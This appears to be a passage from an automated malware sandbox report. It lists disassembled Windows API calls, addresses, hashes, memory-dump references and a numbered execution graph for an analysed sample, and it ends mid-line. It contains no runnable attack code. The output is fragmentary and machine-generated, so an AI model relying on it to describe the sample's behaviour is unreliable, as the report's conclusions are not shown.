                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                  • String ID: HideWindow
                                                                                  • API String ID: 1249568736-780306582
                                                                                  • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                  • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                  APIs
                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                  • String ID: !N~
                                                                                  • API String ID: 623250636-529124213
                                                                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                  Strings
                                                                                  • Error launching installer, xrefs: 00405C48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID: Error launching installer
                                                                                  • API String ID: 3712363035-66219284
                                                                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                  • API String ID: 3509786178-2769509956
                                                                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                  Execution Graph

                                                                                  Execution Coverage:4.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:2.1%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:118
GetEnvironmentVariableW 98393->98394 98409 ae7a51 59 API calls Mailbox 98394->98409 98396 af49aa 98396->98330 98398 a84d37 84 API calls 98397->98398 98399 aff1cf 98398->98399 98410 ae4148 CreateToolhelp32Snapshot Process32FirstW 98399->98410 98401 aff1de 98401->98330 98403 ae4965 FindFirstFileW 98402->98403 98405 ae413f 98402->98405 98404 ae497a FindClose 98403->98404 98403->98405 98404->98405 98405->98330 98407 aa0fe6 Mailbox 59 API calls 98406->98407 98408 a94351 98407->98408 98408->98393 98409->98396 98420 ae4ce2 98410->98420 98412 ae4244 FindCloseChangeNotification 98412->98401 98413 ae4195 Process32NextW 98413->98412 98418 ae418e Mailbox 98413->98418 98414 a91207 59 API calls 98414->98418 98415 a91a36 59 API calls 98415->98418 98418->98412 98418->98413 98418->98414 98418->98415 98426 aa0119 98418->98426 98477 a917e0 59 API calls Mailbox 98418->98477 98478 a9151f 61 API calls 98418->98478 98421 ae4d09 98420->98421 98422 ae4cf0 98420->98422 98480 aa37c3 59 API calls __wcstoi64 98421->98480 98422->98421 98425 ae4d0f 98422->98425 98479 aa385c GetStringTypeW _iswctype 98422->98479 98425->98418 98481 a91207 98426->98481 98429 a91207 59 API calls 98430 aa0137 98429->98430 98431 a91207 59 API calls 98430->98431 98432 aa013f 98431->98432 98433 a91207 59 API calls 98432->98433 98434 aa0147 98433->98434 98435 ad627d 98434->98435 98436 aa017b 98434->98436 98437 a91c9c 59 API calls 98435->98437 98438 a91462 59 API calls 98436->98438 98439 ad6286 98437->98439 98440 aa0189 98438->98440 98506 a919e1 98439->98506 98499 a91981 98440->98499 98443 aa0193 98445 aa01be 98443->98445 98446 a91462 59 API calls 98443->98446 98444 aa01fe 98486 a91462 98444->98486 98445->98444 98448 aa01dd 98445->98448 98458 ad62a6 98445->98458 98449 aa01b4 98446->98449 98503 a91609 98448->98503 98451 a91981 59 API calls 98449->98451 98450 ad6376 98454 a91821 59 API calls 98450->98454 98451->98445 98453 aa020f 98456 aa0221 98453->98456 98459 a91c9c 59 API calls 98453->98459 98472 ad6333 98454->98472 
98457 aa0231 98456->98457 98460 a91c9c 59 API calls 98456->98460 98462 aa0238 98457->98462 98464 a91c9c 59 API calls 98457->98464 98458->98450 98461 ad635f 98458->98461 98470 ad62dd 98458->98470 98459->98456 98460->98457 98461->98450 98466 ad634a 98461->98466 98465 a91c9c 59 API calls 98462->98465 98474 aa023f Mailbox 98462->98474 98463 a91462 59 API calls 98463->98444 98464->98462 98465->98474 98469 a91821 59 API calls 98466->98469 98467 ad633b 98468 a91821 59 API calls 98467->98468 98468->98472 98469->98472 98470->98467 98475 ad6326 98470->98475 98471 a91609 59 API calls 98471->98472 98472->98444 98472->98471 98519 a9153b 59 API calls 2 library calls 98472->98519 98474->98418 98510 a91821 98475->98510 98477->98418 98478->98418 98479->98422 98480->98425 98482 aa0fe6 Mailbox 59 API calls 98481->98482 98483 a91228 98482->98483 98484 aa0fe6 Mailbox 59 API calls 98483->98484 98485 a91236 98484->98485 98485->98429 98487 a914ce 98486->98487 98488 a91471 98486->98488 98490 a91981 59 API calls 98487->98490 98488->98487 98489 a9147c 98488->98489 98492 acf1de 98489->98492 98493 a91497 98489->98493 98491 a9149f _memmove 98490->98491 98491->98453 98521 a91c7e 98492->98521 98520 a91b7c 59 API calls Mailbox 98493->98520 98496 acf1e8 98497 aa0fe6 Mailbox 59 API calls 98496->98497 98498 acf208 98497->98498 98500 a9198f 98499->98500 98502 a91998 _memmove 98499->98502 98500->98502 98524 a91aa4 98500->98524 98502->98443 98504 a91aa4 59 API calls 98503->98504 98505 a91614 98504->98505 98505->98444 98505->98463 98507 a919fb 98506->98507 98509 a919ee 98506->98509 98508 aa0fe6 Mailbox 59 API calls 98507->98508 98508->98509 98509->98445 98511 a9189a 98510->98511 98512 a9182d __NMSG_WRITE 98510->98512 98513 a91981 59 API calls 98511->98513 98514 a91868 98512->98514 98515 a91843 98512->98515 98518 a9184b _memmove 98513->98518 98516 a91c7e 59 API calls 98514->98516 98528 a91b7c 59 API calls Mailbox 98515->98528 98516->98518 98518->98472 98519->98472 98520->98491 98522 aa0fe6 Mailbox 59 API 
calls 98521->98522 98523 a91c88 98522->98523 98523->98496 98525 a91ab7 98524->98525 98527 a91ab4 _memmove 98524->98527 98526 aa0fe6 Mailbox 59 API calls 98525->98526 98526->98527 98527->98502 98528->98518 98529->98346 98530->98354 98531->98360 98532->98372 98533->98376 98535 a9374f 98534->98535 98538 a9376a 98534->98538 98536 a91aa4 59 API calls 98535->98536 98537 a93757 CharUpperBuffW 98536->98537 98537->98538 98538->98252 98540 abd3cd 98539->98540 98541 a83aee 98539->98541 98542 aa0fe6 Mailbox 59 API calls 98541->98542 98543 a83af5 98542->98543 98544 a83b16 98543->98544 98666 a83ba5 59 API calls Mailbox 98543->98666 98544->98270 98547 ac359f 98546->98547 98559 a8bc95 98546->98559 98738 aea48d 89 API calls 4 library calls 98547->98738 98549 a8bf3b 98549->98270 98553 a8c2b6 98553->98549 98554 a8c2c3 98553->98554 98736 a8c483 277 API calls Mailbox 98554->98736 98555 a8bf25 Mailbox 98555->98549 98735 a8c460 10 API calls Mailbox 98555->98735 98558 a8c2ca LockWindowUpdate DestroyWindow GetMessageW 98558->98549 98560 a8c2fc 98558->98560 98586 a8bca5 Mailbox 98559->98586 98739 a85376 60 API calls 98559->98739 98740 ad700c 277 API calls 98559->98740 98562 ac4509 TranslateMessage DispatchMessageW GetMessageW 98560->98562 98561 ac36b3 Sleep 98561->98586 98562->98562 98563 ac4539 98562->98563 98563->98549 98564 a8bf54 timeGetTime 98564->98586 98565 ac405d WaitForSingleObject 98567 ac407d GetExitCodeProcess CloseHandle 98565->98567 98565->98586 98589 a8c36b 98567->98589 98568 a91c9c 59 API calls 98568->98586 98569 a91207 59 API calls 98592 a8c1fa Mailbox 98569->98592 98570 a8c210 Sleep 98570->98592 98571 aa0fe6 59 API calls Mailbox 98571->98586 98572 ac43a9 Sleep 98572->98592 98574 aa0859 timeGetTime 98574->98592 98575 a86cd8 255 API calls 98575->98586 98577 a8c324 timeGetTime 98737 a85376 60 API calls 98577->98737 98579 ae4148 66 API calls 98579->98592 98580 a84d37 84 API calls 98580->98586 98581 ac4440 GetExitCodeProcess 98582 ac446c CloseHandle 98581->98582 98583 ac4456 
WaitForSingleObject 98581->98583 98582->98592 98583->98582 98583->98586 98584 b06562 110 API calls 98584->98592 98586->98555 98586->98561 98586->98564 98586->98565 98586->98568 98586->98570 98586->98571 98586->98572 98586->98575 98586->98577 98586->98580 98587 a86d79 109 API calls 98586->98587 98586->98589 98586->98592 98596 a85376 60 API calls 98586->98596 98601 a8c26d 98586->98601 98602 a8b020 255 API calls 98586->98602 98605 a91a36 59 API calls 98586->98605 98606 afc355 255 API calls 98586->98606 98608 a8a820 255 API calls 98586->98608 98609 a85190 59 API calls Mailbox 98586->98609 98610 a83ea3 68 API calls 98586->98610 98611 a853b0 255 API calls 98586->98611 98612 a83a40 59 API calls 98586->98612 98613 a839be 68 API calls 98586->98613 98614 aea48d 89 API calls 98586->98614 98615 ac3e13 VariantClear 98586->98615 98616 ad6cf1 59 API calls Mailbox 98586->98616 98617 ac3ea9 VariantClear 98586->98617 98618 ad7aad 59 API calls 98586->98618 98619 ac3c57 VariantClear 98586->98619 98620 a841c4 59 API calls Mailbox 98586->98620 98667 a852b0 98586->98667 98676 a89a00 98586->98676 98683 a89c80 98586->98683 98714 aec270 98586->98714 98721 afeedb 98586->98721 98729 afe620 98586->98729 98732 afe60c 98586->98732 98741 b06655 59 API calls 98586->98741 98742 aea058 59 API calls Mailbox 98586->98742 98743 ade0aa 59 API calls 98586->98743 98744 ad6c62 59 API calls 2 library calls 98586->98744 98745 a838ff 59 API calls 98586->98745 98587->98586 98589->98270 98590 ac38aa Sleep 98590->98586 98591 ac44c8 Sleep 98591->98586 98592->98569 98592->98570 98592->98574 98592->98579 98592->98581 98592->98584 98592->98586 98592->98589 98592->98590 98592->98591 98594 a91a36 59 API calls 98592->98594 98599 a83ea3 68 API calls 98592->98599 98746 ae2baf 60 API calls 98592->98746 98747 a85376 60 API calls 98592->98747 98748 a86cd8 277 API calls 98592->98748 98749 ad70e2 59 API calls 98592->98749 98750 ae57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 
98592->98750 98594->98592 98596->98586 98599->98592 98604 a91a36 59 API calls 98601->98604 98602->98586 98604->98555 98605->98586 98606->98586 98608->98586 98609->98586 98610->98586 98611->98586 98612->98586 98613->98586 98614->98586 98615->98586 98616->98586 98617->98586 98618->98586 98619->98586 98620->98586 98626 abd3b1 98625->98626 98629 a83a53 98625->98629 98627 abd3c1 98626->98627 99070 ad6d17 59 API calls 98626->99070 98630 a83a7d 98629->98630 98631 a83a9a Mailbox 98629->98631 99061 a83b31 98629->99061 98633 a83a83 98630->98633 98634 a83b31 59 API calls 98630->98634 98631->98270 98633->98631 99069 a85190 59 API calls Mailbox 98633->99069 98634->98633 98636->98270 98637->98250 98638->98288 98639->98288 98640->98256 98641->98288 98642->98288 98643->98270 98644->98270 98645->98270 98646->98270 99072 a83c30 98647->99072 98649 a83eb3 98650 a83f2d 98649->98650 98651 a83ebd 98649->98651 98652 a8523c 59 API calls 98650->98652 98653 aa0fe6 Mailbox 59 API calls 98651->98653 98654 a83f1d 98652->98654 98655 a83ece 98653->98655 98654->98270 98656 a83edc 98655->98656 98657 a91207 59 API calls 98655->98657 98658 a83eeb 98656->98658 98659 a91bcc 59 API calls 98656->98659 98657->98656 98660 aa0fe6 Mailbox 59 API calls 98658->98660 98659->98658 98661 a83ef5 98660->98661 99079 a83bc8 68 API calls 98661->99079 98663->98288 98664->98270 98665->98288 98666->98544 98668 a85313 98667->98668 98669 a852c6 98667->98669 98671 a852ec 98668->98671 98673 abdf68 TranslateAcceleratorW 98668->98673 98674 a8533e PeekMessageW 98668->98674 98675 a85352 TranslateMessage DispatchMessageW 98668->98675 98751 a8359e 98668->98751 98669->98668 98670 a852d3 PeekMessageW 98669->98670 98670->98668 98670->98671 98671->98586 98673->98668 98673->98674 98674->98668 98674->98671 98675->98674 98677 a89a1d 98676->98677 98678 a89a31 98676->98678 98756 a894e0 98677->98756 98790 aea48d 89 API calls 4 library calls 98678->98790 98680 a89a28 98680->98586 98682 ac2478 98682->98682 98684 a89cb5 98683->98684 98685 
ac247d 98684->98685 98687 a89d1f 98684->98687 98688 a89d79 98684->98688 98686 a853b0 277 API calls 98685->98686 98689 ac2492 98686->98689 98687->98688 98691 a91207 59 API calls 98687->98691 98690 a91207 59 API calls 98688->98690 98694 aa2f70 __cinit 67 API calls 98688->98694 98696 ac24fa 98688->98696 98700 a89f3a 98688->98700 98713 a89f50 Mailbox 98688->98713 98689->98713 98811 aea48d 89 API calls 4 library calls 98689->98811 98690->98688 98693 ac24d8 98691->98693 98695 aa2f70 __cinit 67 API calls 98693->98695 98694->98688 98695->98688 98696->98586 98697 a839be 68 API calls 98697->98713 98698 a853b0 277 API calls 98698->98713 98700->98713 98812 aea48d 89 API calls 4 library calls 98700->98812 98701 aea48d 89 API calls 98701->98713 98702 a8a775 98816 aea48d 89 API calls 4 library calls 98702->98816 98706 ac27f9 98706->98586 98707 a84230 59 API calls 98707->98713 98712 a8a058 98712->98586 98713->98697 98713->98698 98713->98701 98713->98702 98713->98707 98713->98712 98807 a91bcc 98713->98807 98813 ad7aad 59 API calls 98713->98813 98814 afccac 277 API calls 98713->98814 98815 afbc26 277 API calls Mailbox 98713->98815 98817 a85190 59 API calls Mailbox 98713->98817 98818 af9ab0 277 API calls Mailbox 98713->98818 98715 a84d37 84 API calls 98714->98715 98716 aec286 98715->98716 98819 ae4005 98716->98819 98718 aec28e 98719 aec292 GetLastError 98718->98719 98720 aec2a7 98718->98720 98719->98720 98720->98586 98723 afef1e 98721->98723 98728 afeef7 98721->98728 98722 afef40 98726 afef84 98722->98726 98722->98728 98909 a8502b 59 API calls 98722->98909 98723->98722 98908 a8502b 59 API calls 98723->98908 98875 ae6818 98726->98875 98728->98586 98950 afd1c6 98729->98950 98731 afe630 98731->98586 98733 afd1c6 130 API calls 98732->98733 98734 afe61c 98733->98734 98734->98586 98735->98553 98736->98558 98737->98586 98738->98559 98739->98559 98740->98559 98741->98586 98742->98586 98743->98586 98744->98586 98745->98586 98746->98592 98747->98592 98748->98592 98749->98592 98750->98592 98752 
a835e2 98751->98752 98753 a835b0 98751->98753 98752->98668 98753->98752 98754 a835d5 IsDialogMessageW 98753->98754 98755 abd273 GetClassLongW 98753->98755 98754->98752 98754->98753 98755->98753 98755->98754 98757 a853b0 277 API calls 98756->98757 98758 a8951f 98757->98758 98759 ac2001 98758->98759 98775 a89527 _memmove 98758->98775 98799 a85190 59 API calls Mailbox 98759->98799 98761 ac22c0 98805 aea48d 89 API calls 4 library calls 98761->98805 98763 ac22de 98763->98763 98764 a89583 98764->98680 98765 a89944 98767 aa0fe6 Mailbox 59 API calls 98765->98767 98766 a8986a 98769 a8987f 98766->98769 98770 ac22b1 98766->98770 98774 a896e3 _memmove 98767->98774 98768 aa0fe6 59 API calls Mailbox 98768->98775 98772 aa0fe6 Mailbox 59 API calls 98769->98772 98804 afa983 59 API calls 98770->98804 98771 a89741 98771->98766 98780 ac22a0 98771->98780 98784 a8977d 98771->98784 98786 ac2278 98771->98786 98788 ac2253 98771->98788 98800 a88180 277 API calls 98771->98800 98772->98784 98774->98771 98776 a8970e 98774->98776 98778 aa0fe6 Mailbox 59 API calls 98774->98778 98775->98761 98775->98764 98775->98765 98775->98768 98775->98771 98777 a896cf 98775->98777 98776->98771 98791 a8cca0 98776->98791 98777->98765 98779 a896dc 98777->98779 98778->98776 98781 aa0fe6 Mailbox 59 API calls 98779->98781 98803 aea48d 89 API calls 4 library calls 98780->98803 98781->98774 98784->98680 98802 aea48d 89 API calls 4 library calls 98786->98802 98801 aea48d 89 API calls 4 library calls 98788->98801 98790->98682 98792 a8ccda 98791->98792 98793 a8cd02 98791->98793 98794 a89c80 277 API calls 98792->98794 98797 a8cce0 98792->98797 98795 ac4971 98793->98795 98796 a853b0 277 API calls 98793->98796 98793->98797 98794->98797 98795->98797 98806 aea48d 89 API calls 4 library calls 98795->98806 98796->98795 98797->98771 98797->98797 98799->98765 98800->98771 98801->98784 98802->98784 98803->98784 98804->98761 98805->98763 98806->98797 98808 a91bef _memmove 98807->98808 98809 a91bdc 98807->98809 98808->98713 
98809->98808 98810 aa0fe6 Mailbox 59 API calls 98809->98810 98810->98808 98811->98713 98812->98713 98813->98713 98814->98713 98815->98713 98816->98706 98817->98713 98818->98713 98820 a91207 59 API calls 98819->98820 98821 ae4024 98820->98821 98822 a91207 59 API calls 98821->98822 98823 ae402d 98822->98823 98824 a91207 59 API calls 98823->98824 98825 ae4036 98824->98825 98844 aa0284 98825->98844 98830 ae405c 98832 aa0119 59 API calls 98830->98832 98833 ae4070 FindFirstFileW 98832->98833 98834 ae408f 98833->98834 98835 ae40fc FindClose 98833->98835 98834->98835 98838 ae4093 98834->98838 98840 ae4107 Mailbox 98835->98840 98836 ae40d7 FindNextFileW 98836->98834 98836->98838 98837 a91c9c 59 API calls 98837->98838 98838->98834 98838->98836 98838->98837 98841 a91900 59 API calls 98838->98841 98863 a917e0 59 API calls Mailbox 98838->98863 98840->98718 98842 ae40c8 DeleteFileW 98841->98842 98842->98836 98843 ae40f3 FindClose 98842->98843 98843->98840 98864 ab1b70 98844->98864 98847 aa02cd 98849 a919e1 59 API calls 98847->98849 98848 aa02b0 98850 a91821 59 API calls 98848->98850 98851 aa02bc 98849->98851 98850->98851 98866 a9133d 98851->98866 98854 ae4fec GetFileAttributesW 98855 ae404a 98854->98855 98855->98830 98856 a91900 98855->98856 98857 acf534 98856->98857 98858 a91914 98856->98858 98860 a91c7e 59 API calls 98857->98860 98870 a918a5 98858->98870 98862 acf53f __NMSG_WRITE _memmove 98860->98862 98861 a9191f 98861->98830 98863->98838 98865 aa0291 GetFullPathNameW 98864->98865 98865->98847 98865->98848 98867 a9134b 98866->98867 98868 a91981 59 API calls 98867->98868 98869 a9135b 98868->98869 98869->98854 98871 a918b4 __NMSG_WRITE 98870->98871 98872 a91c7e 59 API calls 98871->98872 98873 a918c5 _memmove 98871->98873 98874 acf4f1 _memmove 98872->98874 98873->98861 98910 ae6735 98875->98910 98877 ae683d _memmove 98877->98728 98879 ae6899 98926 ae6a73 89 API calls 2 library calls 98879->98926 98880 ae68b1 98882 ae6921 98880->98882 98885 ae6917 98880->98885 98887 ae68ca 
98880->98887 98882->98877 98883 ae699f 98882->98883 98884 ae6951 98882->98884 98886 ae69a6 98883->98886 98894 ae6a3a 98883->98894 98890 ae6956 98884->98890 98893 ae6971 98884->98893 98885->98882 98892 ae68fe 98885->98892 98888 ae6a1c 98886->98888 98889 ae69a9 98886->98889 98927 ae8cd0 61 API calls 98887->98927 98888->98877 98934 a850d5 59 API calls 98888->98934 98897 ae69ad 98889->98897 98898 ae69e5 98889->98898 98890->98877 98930 a85087 59 API calls 98890->98930 98917 ae7c7f 98892->98917 98893->98877 98931 a85087 59 API calls 98893->98931 98894->98877 98935 a850d5 59 API calls 98894->98935 98897->98877 98932 a850d5 59 API calls 98897->98932 98898->98877 98933 a850d5 59 API calls 98898->98933 98904 ae68d2 98928 ae8cd0 61 API calls 98904->98928 98906 ae68e9 _memmove 98929 ae8cd0 61 API calls 98906->98929 98908->98722 98909->98726 98911 ae6785 98910->98911 98915 ae6746 98910->98915 98946 a8502b 59 API calls 98911->98946 98912 ae6783 98912->98877 98912->98879 98912->98880 98914 a84d37 84 API calls 98914->98915 98915->98912 98915->98914 98936 aa312d 98915->98936 98918 ae7c8a 98917->98918 98919 aa0fe6 Mailbox 59 API calls 98918->98919 98920 ae7c91 98919->98920 98921 ae7cbe 98920->98921 98922 ae7c9d 98920->98922 98924 aa0fe6 Mailbox 59 API calls 98921->98924 98923 aa0fe6 Mailbox 59 API calls 98922->98923 98925 ae7ca6 _memset 98923->98925 98924->98925 98925->98877 98926->98877 98927->98904 98928->98906 98929->98892 98930->98877 98931->98877 98932->98877 98933->98877 98934->98877 98935->98877 98937 aa3139 98936->98937 98938 aa31ae 98936->98938 98945 aa315e 98937->98945 98947 aa8d58 58 API calls __getptd_noexit 98937->98947 98949 aa31c0 60 API calls 3 library calls 98938->98949 98940 aa31bb 98940->98915 98942 aa3145 98948 aa8fe6 9 API calls __vswprintf_l 98942->98948 98944 aa3150 98944->98915 98945->98915 98946->98912 98947->98942 98948->98944 98949->98940 98951 a84d37 84 API calls 98950->98951 98952 afd203 98951->98952 98955 afd24a Mailbox 98952->98955 98988 afde8e 
98952->98988 98954 afd29b Mailbox 98954->98955 98961 a84d37 84 API calls 98954->98961 98975 afd4a2 98954->98975 99021 aefc0d 59 API calls 2 library calls 98954->99021 99022 afd6c8 61 API calls 2 library calls 98954->99022 98955->98731 98956 afd617 99038 afdfb1 92 API calls Mailbox 98956->99038 98959 afd626 98960 afd4b0 98959->98960 98963 afd632 98959->98963 99001 afd057 98960->99001 98961->98954 98963->98955 98967 afd4e9 99016 aa0e38 98967->99016 98970 afd51c 99024 a847be 98970->99024 98971 afd503 99023 aea48d 89 API calls 4 library calls 98971->99023 98974 afd50e GetCurrentProcess TerminateProcess 98974->98970 98975->98956 98975->98960 98980 afd68d 98980->98955 98984 afd6a1 FreeLibrary 98980->98984 98981 afd554 99036 afdd32 107 API calls _free 98981->99036 98984->98955 98986 a8523c 59 API calls 98987 afd565 98986->98987 98987->98980 98987->98986 99037 a84230 59 API calls Mailbox 98987->99037 99039 afdd32 107 API calls _free 98987->99039 98989 a91aa4 59 API calls 98988->98989 98990 afdea9 CharLowerBuffW 98989->98990 99040 adf903 98990->99040 98994 a91207 59 API calls 98995 afdee2 98994->98995 98996 a91462 59 API calls 98995->98996 98997 afdef9 98996->98997 98998 a91981 59 API calls 98997->98998 98999 afdf05 Mailbox 98998->98999 99000 afdf41 Mailbox 98999->99000 99047 afd6c8 61 API calls 2 library calls 98999->99047 99000->98954 99002 afd072 99001->99002 99006 afd0c7 99001->99006 99003 aa0fe6 Mailbox 59 API calls 99002->99003 99005 afd094 99003->99005 99004 aa0fe6 Mailbox 59 API calls 99004->99005 99005->99004 99005->99006 99007 afe139 99006->99007 99008 afe362 Mailbox 99007->99008 99015 afe15c _strcat _wcscpy __NMSG_WRITE 99007->99015 99008->98967 99009 a8502b 59 API calls 99009->99015 99010 a850d5 59 API calls 99010->99015 99011 a85087 59 API calls 99011->99015 99012 a84d37 84 API calls 99012->99015 99013 aa593c 58 API calls __malloc_crt 99013->99015 99015->99008 99015->99009 99015->99010 99015->99011 99015->99012 99015->99013 99050 ae5e42 61 API calls 2 library 
